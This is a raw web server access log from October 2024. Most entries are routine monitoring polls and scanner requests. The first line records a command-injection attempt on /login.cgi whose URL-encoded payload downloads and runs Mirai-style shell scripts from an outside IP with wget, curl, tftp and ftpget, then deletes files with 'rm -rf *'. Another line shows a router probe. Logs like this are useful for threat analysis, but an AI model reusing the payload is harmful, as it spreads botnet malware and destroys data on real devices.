82.142.30.103 - - [03/Oct/2024:18:32:05 +0200] "GET /login.cgi?cli=aa%20aa%27;cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F93.123.85.221%2Fmiraigg.sh%3B%20curl%20-O%20http%3A%2F%2F93.123.85.221%2Fmiraigg.sh%3B%20chmod%20777%20miraigg.sh%3B%20sh%20miraigg.sh%3B%20tftp%2093.123.85.221%20-c%20get%20miraigg.sh%3B%20chmod%20777%20miraigg.sh%3B%20sh%20miraigg.sh%3B%20tftp%20-r%20miraigg2.sh%20-g%2093.123.85.221%3B%20chmod%20777%20miraigg2.sh%3B%20sh%20miraigg2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%2093.123.85.221%20miraigg1.sh%20miraigg1.sh%3B%20sh%20miraigg1.sh%3B%20rm%20-rf%20miraigg.sh%20miraigg.sh%20miraigg2.sh%20miraigg1.sh%3B%20rm%20-rf%20*%0A HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [03/Oct/2024:18:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:33:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.55.138 - - [03/Oct/2024:18:34:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.59 - - [03/Oct/2024:18:34:06 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:34:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:18:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:18:36:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:36:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:18:37:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:37:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:18:38:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [03/Oct/2024:18:38:14 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
212.91.246.72 - - [03/Oct/2024:18:38:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
